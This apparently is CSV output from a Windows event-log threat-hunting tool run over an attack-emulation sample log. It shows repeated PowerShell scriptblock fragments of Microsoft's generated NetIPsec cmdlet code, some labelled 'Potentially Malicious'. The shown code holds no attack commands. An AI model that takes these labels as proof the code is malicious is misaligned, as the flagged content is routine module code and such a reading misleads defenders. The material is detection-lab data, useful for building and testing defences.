[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } 
$__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { 
__cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"zation_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', 
$__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { 
$__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecQuickModeCryptoSet' -Alias '*' function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is 
[System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains 